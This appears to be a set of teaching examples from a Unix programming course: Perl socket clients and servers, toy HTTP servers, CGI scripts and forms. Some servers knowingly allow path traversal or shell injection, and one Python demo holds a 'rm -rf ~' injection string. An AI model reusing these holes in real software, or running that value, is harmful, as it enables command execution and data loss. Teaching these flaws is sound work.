use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 4242, Listen => SOMAXCONN) or die;

while ($c = $server->accept()) {
    printf STDERR "[Connection from %s]\n", $c->peerhost;
    print $c scalar localtime,"\n";
    close $c;
}

simple Perl TCP/IP client

use IO::Socket;
$server_host =  $ARGV[0] || 'localhost';
$server_port = 4242;
$c = IO::Socket::INET->new(PeerAddr => $server_host, PeerPort  => $server_port) or die;
$time = <$c>;
close $c;
print "Time is $time\n";

fetch files via http from the webserver at the specified URL; see HTTP::Request::Common for a more general solution

use IO::Socket;
foreach $url (@ARGV) {
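    # [^\/:]+ stops the host at ':' so that an optional :port can be captured
    my ($host, $port, $path) = $url =~ /http:\/\/([^\/:]+)(?::(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port || 80) or die;
    # send request for web page to server
    print $c "GET $path HTTP/1.0\n\n";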
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}
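
Splitting a URL into host, port and path by hand is easy to get subtly wrong. As a hedged Python 3 sketch, the standard library's urllib.parse.urlsplit can do the splitting; the function name split_http_url and the defaults of port 80 and path / are choices made for this illustration.

```python
from urllib.parse import urlsplit

def split_http_url(url):
    """Return (host, port, path) for an http URL, defaulting to port 80 and path '/'."""
    parts = urlsplit(url)
    if parts.scheme != 'http' or not parts.hostname:
        raise ValueError("not an http URL: %s" % url)
    path = parts.path or '/'
    if parts.query:
        path += '?' + parts.query
    return parts.hostname, parts.port or 80, path

print(split_http_url("http://localhost:2041/index.html"))
print(split_http_url("http://www.example.com"))
```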

listen on port 2041 for incoming connections, print their details to stdout, then send back a 404 status code

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    print $c "HTTP/1.0 404 This webserver always returns a 404 status code\n";
    close $c;
}

listen on port 2041 for incoming connections, print their details to stdout, then send back a 200 status code and a short plain text message

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this web server at http://localhost:2041/\n\n";

$content = "Everything is OK - you will pass COMP[29]041.\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    
    # print header
    print $c "HTTP/1.0 200 OK\n";
    print $c "Content-Type: text/plain\n";
    printf $c "Content-Length: %d\n\n", length($content);

    print $c $content;
    close $c;
}
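
The response above is a status line, header fields, a blank line, then the content. A minimal Python 3 sketch of assembling such a response as bytes follows. The function name build_response is hypothetical. The sketch uses CRLF line endings, as the HTTP specification asks for, where the Perl examples use bare newlines that most clients tolerate, and it computes Content-Length from the encoded bytes rather than the character count.

```python
def build_response(status_line, content_type, body):
    """Assemble an HTTP/1.0 response; Content-Length is the body's length in bytes."""
    payload = body.encode('utf-8')
    header = "HTTP/1.0 %s\r\nContent-Type: %s\r\nContent-Length: %d\r\n\r\n" % (
        status_line, content_type, len(payload))
    return header.encode('ascii') + payload

response = build_response("200 OK", "text/plain", "Everything is OK\n")
print(response)
```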

return files in response to incoming http requests to port 2041. Note: does not check that the request is well-formed or that the file exists; also very insecure, as the pathname may contain ..

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        my $request = <$c>;
        print "Connection from ", $c->peerhost, ": $request";
        $request =~ /^GET (.+) HTTP\/1.[01]\s*$/;
        print "Sending back /home/cs2041/public_html/$1\n";
        open my $f, '<',"/home/cs2041/public_html/$1";
        $content = join "", <$f>;
        close $f;
        print $c "HTTP/1.0 200 OK\n";
        print $c "Content-Type: text/html\n";
        printf $c "Content-Length: %d\n\n", length($content);
        print $c $content;
        close $c;
    }
}

return files in response to incoming http requests to port 2041, determine appropriate mime type using /etc/mime.types

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

open my $mt, '<', "/etc/mime.types" or die "Can not open /etc/mime.types: $!\n";
while ($line = <$mt>) {
    $line =~ s/#.*//;
    my ($mime_type, @extensions) = split /\s+/, $line;
    foreach $extension (@extensions) {
        $mime_type{$extension} = $mime_type;
    }
}
close $mt;
while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        print "waiting for connection";
        my $request = <$c>;
        last if !$request;
        printf "Connection from %s, request: $request", $c->peerhost;
        my $content_type = "text/plain";
        my $status_line = "400 BAD REQUEST";
        my $content = "";

        if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
            # remove any occurrences of .. from pathname to prevent access outside 2041 directory
            $url =~ s/(^|\/)\.\.(\/|$)//g;
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;

            print "$file requested\n";
            if (open my $f, '<', $file) {
                my ($extension) = $file =~ /\.(\w+)$/;
                $status_line = "200 OK";
                $content_type = $mime_type{$extension} if $extension && $mime_type{$extension};
                $content = join "", <$f>;
            } else {
                $status_line = "404 FILE NOT FOUND";
                $content = "File $file not found\n";
            }
        }

        my $header = sprintf "HTTP/1.0 $status_line\nContent-Type: $content_type\nContent-Length: %d\n\n", length($content);
        print "Sending this header:\n", $header;

        print $c $header, $content;
        close $c;
    }
}
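
A single pass of the .. substitution can leave a .. behind when two occur back to back, because regex matches cannot overlap. The Python 3 sketch below reproduces the substitution and contrasts it with normalising the path and checking that it stays under the document root. The function names are hypothetical, and the check does not resolve symbolic links.

```python
import posixpath, re

DOCUMENT_ROOT = "/home/cs2041/public_html"

def strip_dotdot(url):
    """The substitution used in the Perl servers, for comparison."""
    return re.sub(r'(^|/)\.\.(/|$)', '', url)

def safe_path(url, root=DOCUMENT_ROOT):
    """Return the normalised file path for url, or None if it would leave root."""
    path = posixpath.normpath(posixpath.join(root, url.lstrip('/')))
    if path == root or path.startswith(root + '/'):
        return path
    return None

print(strip_dotdot("/../../etc/passwd"))   # a .. survives the substitution
print(safe_path("/../../etc/passwd"))
print(safe_path("/lec/index.html"))
```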

use IO::Socket;
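foreach $url (@ARGV) {
    # [^\/:]+ stops the host at ':' so that an optional :port can be captured
    my ($host, $port, $path) = $url =~ /http:\/\/([^\/:]+)(?::(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port || 80) or die;
    # send request for web page to server
    sleep 3600;
    print $c "GET $path HTTP/1.0\n\n";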
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}

return files in response to incoming http requests to port 2041; access via http://localhost:2041/. This version handles each incoming request in a child process.

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    if (fork() != 0) {
        # parent process goes to waiting for next request
        close($c);
        next;
    }
    # child processes request
    my $request = <$c>;
    printf "Connection from %s, request: $request", $c->peerhost;
    if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
        # remove any occurrences of .. from pathname to prevent access outside 2041 directory
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        my $file = "/home/cs2041/public_html/$url";
        $file .= "/index.html" if -d $file;
        if (open my $f, '<', $file) {
            print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n", <$f>;
        } else {
            print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
    # child must terminate here otherwise it would compete with parent for requests
    exit 0;
}

return files in response to incoming http requests; files with suffix .cgi are executed and their output returned. Only the GET method is supported. Assumes application/x-www-form-urlencoded data so CGI.pm won't work.

See http://search.cpan.org/dist/HTTP-Server-Simple/ for a much more general solution

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    my $request = <$c>;
    if ($request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
        my $url = $1;
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        if ($url =~ /^(.*\.cgi)(\?(.*))?$/) {
            my $cgi_script = "/home/cs2041/public_html/$1";
            $ENV{SCRIPT_URI} = $1;
            $ENV{QUERY_STRING} = $3 || '';
            $ENV{REQUEST_METHOD} = "GET";
            $ENV{REQUEST_URI} = $url;
            print $c "HTTP/1.0 200 OK\n";
            print $c `$cgi_script` if -x $cgi_script;
        } else {
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;
            if (!-e $file) {
                print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
            } else {
                print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
                open my $f, '<', $file or next;
                print $c (<$f>);
                close $f;
            }
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
}

return files in response to incoming http requests; files with suffix .cgi are executed and their output returned

GET & POST requests are handled; assumes application/x-www-form-urlencoded data so CGI.pm won't work

See http://search.cpan.org/dist/HTTP-Server-Simple/ for a much more general solution

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    my $request = <$c>;
    printf "Connection from %s, request: $request", $c->peerhost;
    my $content_length = 0;
    while (<$c>) {
        print;
        $header_field{$1} = $2 if /(\S+):\s*(.*)/;
        last if /^\s*$/;
    }
    if ($request =~ /^(GET|POST) (.+) HTTP\/1.[01]\s*$/) {
        my $method = $1;
        my $url = $2;
        $url =~ s/(^|\/)\.\.(\/|$)//g;
        if ($url =~ /^(.*\.cgi)(\?(.*))?$/) {
            my $cgi_script = "/home/cs2041/public_html/$1";
            my $parameters = '';
            if ($method eq 'GET') {
                $parameters = $3 if $3;
            } else {
                read($c, $parameters, $header_field{'Content-Length'});
            }
            print $c "HTTP/1.0 200 OK\n";
            print "Running: echo '$parameters'|$cgi_script\n";
            # provide a minimal set of environment variables
            %ENV = (CONTENT_LENGTH => length $parameters,
                    CONTENT_TYPE => 'application/x-www-form-urlencoded',
                    REQUEST_METHOD => $method,
                    REQUEST_URI => $url,
                    SCRIPT_NAME => $cgi_script);
            # obvious security hole here from shell meta-characters in parameters
            print $c `echo '$parameters'|$cgi_script`;
        } else {
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;
            if (!-e $file) {
                print $c "HTTP/1.0 404 FILE NOT FOUND\nContent-Type: text/plain\n\nFile $file not found\n";
            } else {
                print $c "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
                open my $f, '<', $file or die;
                print $c (<$f>);
                close $f;
            }
        }
    } else {
        print $c "HTTP/1.0 400 BAD REQUEST\nContent-Type: text/plain\n\nBAD REQUEST\n";
    }
    close $c;
}
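
The comment in the server above notes that interpolating request parameters into a shell command is a security hole. A minimal Python sketch of one way to avoid it, assuming the CGI program can be started directly and given its parameters on standard input. `run_cgi` and `echo_stdin` are hypothetical names used only for illustration; they are not part of the server above.

```python
import subprocess
import sys

def run_cgi(argv, parameters, env=None):
    """Run a program without a shell, passing parameters on its stdin.

    argv is a list, so no string is ever parsed by /bin/sh and shell
    meta-characters in parameters are treated as ordinary data.
    """
    result = subprocess.run(
        argv,
        input=parameters.encode(),
        stdout=subprocess.PIPE,
        env=env,
        check=False,
    )
    return result.stdout.decode()

# Hypothetical stand-in for a CGI script: copy stdin to stdout unchanged.
echo_stdin = [sys.executable, "-c",
              "import sys; sys.stdout.write(sys.stdin.read())"]

# Parameters that would break out of the single quotes in a shell command.
hostile = "x=1'; rm -rf ~; echo '"
print(run_cgi(echo_stdin, hostile))
```

Because no shell is involved, the quote and semicolon characters arrive at the child process as plain text.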

<!DOCTYPE html>
<html lang="en">
<head>
<title>Command</title>
</head>
<body>
<input type=text id="x" onkeyup="sum();"> +
<input type=text id="y" onkeyup="sum();"> =
<input type=text id="sum" readonly="readonly">
<script type="text/javascript">
function sum() {
    var x = parseInt(document.getElementById('x').value) || 0;
    var y = parseInt(document.getElementById('y').value) || 0;
    document.getElementById('sum').value = x + y;
}
</script>
</body>
</html>

<html>
<head>
<title>Command</title>
</head>
<body>
<button id="match">Match</button> regular expression <input type=text id=regex>
<br>
against string <input type=text id=string>
<div id="show"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(
    function() {
        $("#match").click(
            function() {
                $.get(
                    "match.cgi",
                    {string:$("#string").val(), regex:$("#regex").val()},
                    function(data) {
                        $("#show").html(data)
                    }
                )
            }
        )
    }
)
</script>
</body>
</html>

See match.html

use CGI qw/:all/;
print header;
if (param('string') =~ param('regex')) {
    print b('Match succeeded, this substring matched: ');
    print tt(escapeHTML($&));
} else {
    print b('Match failed');
}

use Storable;
$cache_file = "./.cache";
%h = %{retrieve($cache_file)} if -r $cache_file;
$h{COUNT}++;
print "This script has now been run $h{COUNT} times\n";
store(\%h, $cache_file);

Fetch files via HTTP from the web server at each specified URL, with a simple cookie implementation (no expiry).

See HTTP::Request::Common for a more general solution.

use Storable;

$cookies_db = "./.cookies";
%cookies = %{retrieve($cookies_db)} if -r $cookies_db;

use IO::Socket;
use IO::Socket::SSL;

foreach (@ARGV) {
    my ($protocol, $host, $port, $path) = /(https?):\/\/([^\/:]+)(?::(\d+))?(.*)/ or die;
    if ($protocol eq "http") {
        $c = IO::Socket::INET->new(PeerAddr => $host, PeerPort  => $port || 80) or die;
    } else {
        $c = IO::Socket::SSL->new(PeerAddr => $host, PeerPort  => $port || 443) or die;
    }
    print $c "GET $path HTTP/1.0\n";
    foreach $domain (keys %cookies) {
        next if $host !~ /\Q$domain\E$/;
        foreach $cookie_path (keys %{$cookies{$domain}}) {
            next if $path !~ /^\Q$cookie_path\E/;
            # look cookies up under the stored cookie path, not the request path
            foreach $name (keys %{$cookies{$domain}{$cookie_path}}) {
                print $c "Cookie: $name=$cookies{$domain}{$cookie_path}{$name}\n";
                print STDERR "Sent cookie $name=$cookies{$domain}{$cookie_path}{$name}\n";
            }
        }
    }
    print $c "\n";
    while (<$c>) {
        last if /^\s*$/;
        next if !/^Set-Cookie:/i;
        my ($name,$value, %v) = /([^=;\s]+)=([^=;\s]+)/g;
        my $domain = $v{'domain'} || $host;
        my $path = $v{'path'} || $path;
        $cookies{$domain}{$path}{$name} = $value;
        print STDERR "Received cookie $domain $path $name=$value\n";
    }
    my @webpage = <$c>;
    print STDOUT @webpage;
}

store(\%cookies, $cookies_db);
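
The cookie handling above can be sketched in Python as follows. This is only an illustration under stated assumptions: it uses the standard library's `http.cookies.SimpleCookie` to parse the header rather than the regex in the script, and `parse_set_cookie` and `cookie_applies` are hypothetical helper names.

```python
from http.cookies import SimpleCookie

def parse_set_cookie(header_value, default_domain, default_path):
    """Return (domain, path, name, value) tuples for one Set-Cookie header value.

    Missing domain/path attributes fall back to the request's host and path,
    as in the script above.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    parsed = []
    for name, morsel in jar.items():
        domain = morsel["domain"] or default_domain
        path = morsel["path"] or default_path
        parsed.append((domain, path, name, morsel.value))
    return parsed

def cookie_applies(cookie_domain, cookie_path, host, path):
    """Same rule as the script: host ends with the cookie's domain and
    the request path starts with the cookie's path."""
    return host.endswith(cookie_domain) and path.startswith(cookie_path)

print(parse_set_cookie("x=5; Path=/cgi; Domain=example.com", "localhost", "/"))
print(cookie_applies("example.com", "/cgi", "www.example.com", "/cgi/x.cgi"))
```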

Retrieves the value stored for x in a cookie, if there is one, increments it, and sets the cookie to the new value.

$x = 0;
if (defined $ENV{HTTP_COOKIE} && $ENV{HTTP_COOKIE} =~ /\bx=(\d+)/) {
    $x = $1 + 1;
}
print "Content-type: text/html
Set-Cookie: x=$x;

<html><head></head><body>
x=$x
</body></html>";

Retrieves the value stored for x in a cookie, if there is one, increments it, and sets the cookie to the new value.

use CGI qw/:all/;
use CGI::Cookie;

%cookies = fetch CGI::Cookie;
$x = 0;
$x = $cookies{'x'}->value if $cookies{'x'};
$x++;
print header(-cookie=>"x=$x"), start_html('Cookie Example'), "x=$x", end_html;
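
For comparison, a minimal Python sketch of the same cookie counter, following the logic of the first (plain Perl) version above. It assumes the web server supplies the cookie string the way CGI does in `HTTP_COOKIE`; `next_counter` and `response` are hypothetical names for illustration.

```python
import re

def next_counter(http_cookie):
    """Return the value to store in cookie x, given the HTTP_COOKIE string (or None)."""
    match = re.search(r"\bx=(\d+)", http_cookie or "")
    return int(match.group(1)) + 1 if match else 0

def response(http_cookie):
    """Build the full CGI response: headers, a blank line, then the HTML body."""
    x = next_counter(http_cookie)
    return (
        "Content-type: text/html\n"
        f"Set-Cookie: x={x};\n"
        "\n"
        f"<html><head></head><body>\nx={x}\n</body></html>"
    )

# In a real CGI script the argument would be os.environ.get("HTTP_COOKIE").
print(response("theme=dark; x=41"))
```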

CGI: lecture slides, lecture notes, CGI examples

External resources: CGI.pm tutorial


Output some simple HTML

echo 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>'

Output some simple HTML

print 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>
';

Output some simple HTML

use CGI qw/:all/;

print header,
      start_html('Hello World'),
      h2('Hello World'),
      end_html;

Print some HTML plus information about the environment in which the CGI script has been run

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
eof

for command in pwd id hostname 'uname -a'
do
    echo "$command: `$command`"
done

cat <<eof
</pre>
</body>
</html>
eof


Print some HTML plus information about the environment in which the CGI script has been run

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
";

for $command ("pwd","id","hostname","uname -a") {
    print " $command: ",` $command`;
}

print "
</pre>
</body>
</html>
";


Print some HTML plus the environment passed to CGI script by the web server

Note: a < character in an environment variable's value will be interpreted by the browser as the start of an HTML tag.

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
`env`
</pre>
</body>
</html>
eof
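
The note above points out that a < in a value is treated as markup. One common remedy is to escape the text before embedding it in the page; a minimal Python sketch, assuming the standard library's `html.escape` (`environment_as_html` is a hypothetical helper name):

```python
import html

def environment_as_html(environ):
    """Render name=value lines inside <pre>, escaping &, < and > so that
    values are displayed literally instead of being parsed as HTML."""
    lines = [f"{name}={value}" for name, value in sorted(environ.items())]
    return "<pre>\n" + html.escape("\n".join(lines)) + "\n</pre>"

# In a CGI script the argument would be os.environ.
print(environment_as_html({"QUERY_STRING": "q=<b>bold</b>&x=1"}))
```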


Print some HTML plus the environment passed to CGI script by the web server

Note: a < character in an environment variable's value will be interpreted by the browser as the start of an HTML tag.

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
";

system "env";

print "
</pre>
</body>
</html>
";


<html>
<head>
<title>An Example Form</title>
</head><body><h1>A Simple Example</h1>
<form method="post" action="show_input_parameters.cgi">
What's your name?
<input type="text" name="name">
<p>
What's the combination?
<p>
<input type="checkbox" name="words" value="eenie" checked="checked">eenie
<input type="checkbox" name="words" value="meenie">meenie
<input type="checkbox" name="words" value="minie" checked="checked">minie
<input type="checkbox" name="words" value="moe">moe
<p>
What's your favorite colour?
<select name="colour">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
<option value="chartreuse">chartreuse</option>
</select>
<p>
<input type=hidden name="user" value="andrewt">
<input type=hidden name="password" value="secret">
<input type="submit" name="answer">
</form>
</body>
</html>

Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the POST method which passes parameters on STDIN

cat <<eof
Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<pre>
`cat`
</pre>
</body>
</html>
eof



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the POST method which passes parameters on STDIN

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
";

print <>;

print "
</pre>
<hr>
</body>
</html>
";


Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the GET method, which passes parameters in the QUERY_STRING environment variable

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Input Parameters</h2>
<pre>
$QUERY_STRING
</pre>
</body>
</html>
eof



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

Only works for the GET method, which passes parameters in the QUERY_STRING environment variable

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
$ENV{QUERY_STRING}
</pre>
<hr>
</body>
</html>
";


Output some simple HTML and the input parameters the web server has passed on to the CGI script.

if test "$REQUEST_METHOD" = POST
then
    parameters="`cat`"
else
    parameters="$QUERY_STRING"
fi

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>

<h2>$REQUEST_METHOD Request - Input Parameters</h2>
<pre>
$parameters
</pre>
</body>
</html>
eof
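
The same choice between standard input and QUERY_STRING can be sketched in Python. This is an illustration only: it takes the environment and input stream as arguments so it can be tried without a web server, and it reads text rather than bytes, which is a simplification. `read_parameters` is a hypothetical name.

```python
import io

def read_parameters(environ, stdin):
    """Return the raw, still URL-encoded parameter string for a CGI request.

    POST: the parameters arrive on standard input, CONTENT_LENGTH long.
    Otherwise (GET): they arrive in the QUERY_STRING environment variable.
    """
    if environ.get("REQUEST_METHOD") == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        return stdin.read(length)
    return environ.get("QUERY_STRING", "")

# In a real CGI script: read_parameters(os.environ, sys.stdin)
post = {"REQUEST_METHOD": "POST", "CONTENT_LENGTH": "9"}
print(read_parameters(post, io.StringIO("name=Fred")))
get = {"REQUEST_METHOD": "GET", "QUERY_STRING": "colour=red"}
print(read_parameters(get, io.StringIO("")))
```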



Output some simple HTML and the input parameters the web server has passed on to the CGI script.

if ($ENV{REQUEST_METHOD} eq 'POST') {
    $parameters = <>;
} else {
    $parameters = $ENV{QUERY_STRING}
}

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<pre>
$parameters
</pre>
<hr>
</body>
</html>
";


<html>
<head>
<title>An Example Form</title>
</head><body><h1>A Simple Example</h1>
<form method="post" action="show_input_parameters_table.cgi">
What's your name?
<input type="text" name="name">
<p>
What's the combination?
<p>
<input type="checkbox" name="words" value="eenie" checked="checked">eenie
<input type="checkbox" name="words" value="meenie">meenie
<input type="checkbox" name="words" value="minie" checked="checked">minie
<input type="checkbox" name="words" value="moe">moe
<p>
What's your favorite colour?
<select name="colour">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
<option value="chartreuse">chartreuse</option>
</select>
<p>
<input type=hidden name="user" value="andrewt">
<input type=hidden name="password" value="secret">
<input type="submit" name="answer">
</form>
</body>
</html>

Output some simple HTML and a table of the input parameters the web server has passed on to the CGI script.

print "Content-type: text/html

<html>
<head></head>
<body>
<h2>Input Parameters</h2>
<hr>
<table border=1>
";

if ($ENV{REQUEST_METHOD} eq 'POST') {
    $parameters = <>;
} else {
    $parameters = $ENV{QUERY_STRING}
}

foreach (split(/\&/, $parameters)) {
    /([^=]*)=(.*)/;
    print "<tr><td>$1<td>$2\n";
}

print "
</table>
<hr>
</body>
</html>
";


Output some simple HTML and a table of the data passed to the CGI script.

use CGI qw/:all/;

print header,
      start_html('Input Parameters'),
      h2('Input Parameters'),
      "<table border=1>";
foreach $p (param()) {
    printf "<tr><td>%s<td>%s\n", $p, param($p);
}
print "</table>",hr,end_html;
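
The hand-written version above splits the parameter string on & and = but leaves values URL-encoded (for example + for a space). A minimal Python sketch of building the same table with decoding and HTML escaping, assuming the standard library's `urllib.parse.parse_qsl`; `parameters_table` is a hypothetical name.

```python
import html
from urllib.parse import parse_qsl

def parameters_table(raw):
    """Turn a raw query string into an HTML table, one row per name/value pair.

    parse_qsl decodes %XX escapes and '+', and html.escape stops decoded
    values from being interpreted as markup.
    """
    rows = []
    for name, value in parse_qsl(raw, keep_blank_values=True):
        rows.append(f"<tr><td>{html.escape(name)}<td>{html.escape(value)}")
    return "<table border=1>\n" + "\n".join(rows) + "\n</table>"

print(parameters_table("name=Andrew+T&words=eenie&words=minie&colour=%3Cred%3E"))
```

Repeated names such as words each get their own row, which matches how checkbox groups are submitted.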


Demonstrating use of CGI::Carp to redirect errors to browser

The warning appears as a comment in the HTML source

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Handling warnings in CGI Scripts');
warningsToBrowser(1);
warn "example warning";     # generate a warning
die "example fatal error";  # generate a fatal error
print end_html;

Outputs a form which will rerun the script

cat <<eof
Content-type: text/html

<html><head><title>Self replicating Form</title></head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

print <<eof
Content-type: text/html

<html><head><title>Self replicating Form</title></head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

use CGI qw/:all/;

print header,
      start_html('Self Replicating Form'),
      start_form,
      submit,
      end_form,
      end_html;


Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string">
</form>
<p>
eof

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print start_form;
print 'Enter a string: ';
print textfield('string');
print end_form;

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Sums two numbers and outputs a form which will rerun the script

Note removal of characters other than 0-9 . - + to avoid potential security problems

if test $REQUEST_METHOD = "GET"
then
    parameters="$QUERY_STRING"
else
    read parameters
fi

x=`echo $parameters|sed '
    s/.*x=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`
y=`echo $parameters|sed '
    s/.*y=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Sum Two Numbers</title>
</head>
<body>
eof

sum="?"
test "$x" -a "$y" && sum=`expr "$x" '+' "$y"`

cat <<eof

<form method="GET" action="">
<input type=textfield name=x value=$x>
+
<input type=textfield name=y value=$y>
=
$sum
<input type="submit" value="calculate">
</form>
</body>
</html>
eof
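
The whitelist idea in the script above (keep only 0-9 . - +) can be sketched in Python as follows. This is an illustration under assumptions: it decodes the query string with `urllib.parse.parse_qs` and converts to `float` instead of calling `expr`; `sum_parameters` is a hypothetical name.

```python
import re
from urllib.parse import parse_qs

def sum_parameters(query_string):
    """Return x + y from a query string, or None if either is missing or invalid."""
    fields = parse_qs(query_string)

    def number(name):
        text = fields.get(name, [""])[0]
        # Same whitelist as the sed commands: drop everything except 0-9 . + -
        text = re.sub(r"[^0-9.+-]", "", text)
        try:
            return float(text)
        except ValueError:
            return None

    x, y = number("x"), number("y")
    if x is None or y is None:
        return None
    return x + y

print(sum_parameters("x=3&y=4"))
print(sum_parameters("x=1%60id%60&y=2"))  # back-quoted command is stripped
```

Converting to a number after filtering means strings such as 1.2.3, which pass the character whitelist, are still rejected.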


Sums two numbers and outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Sum Two Numbers');
warningsToBrowser(1);

$x = param("x");
$y = param("y");
if (defined $x && defined $y) {
    printf "%s + %s = %s\n", $x, $y, $x + $y;
}

print start_form, "\n";
print 'Enter x: ', textfield('x'), "\n";
print p;
print 'Enter y: ', textfield('y'), "\n";
print p, "\n";
print submit, "\n";
print end_form,"\n";
print end_html;

Outputs a form which will rerun the script

The value entered last time is made the initial value of the text field

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Initializing A Form');
warningsToBrowser(1);

$last_value = param("string");
if (defined $last_value) {
    print "Last time you entered: $last_value\n";
    $value = "";
} else {
    $value = "initial value";
}

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string" value="$value">
</form>
</html>
eof

Outputs a form which will rerun the script

The value entered last time is made the initial value of the text field

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Initializing A Form');
warningsToBrowser(1);

$last_value = param("string");
if (defined $last_value) {
    print "Last time you entered: $last_value\n";
    param("string", ""); # clear the field
} else {
    param("string", "initial value");
}

print start_form, "\n";
print "Enter a string: \n";
print textfield('string'), "\n";
print end_form, "\n";
print end_html, "\n";

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

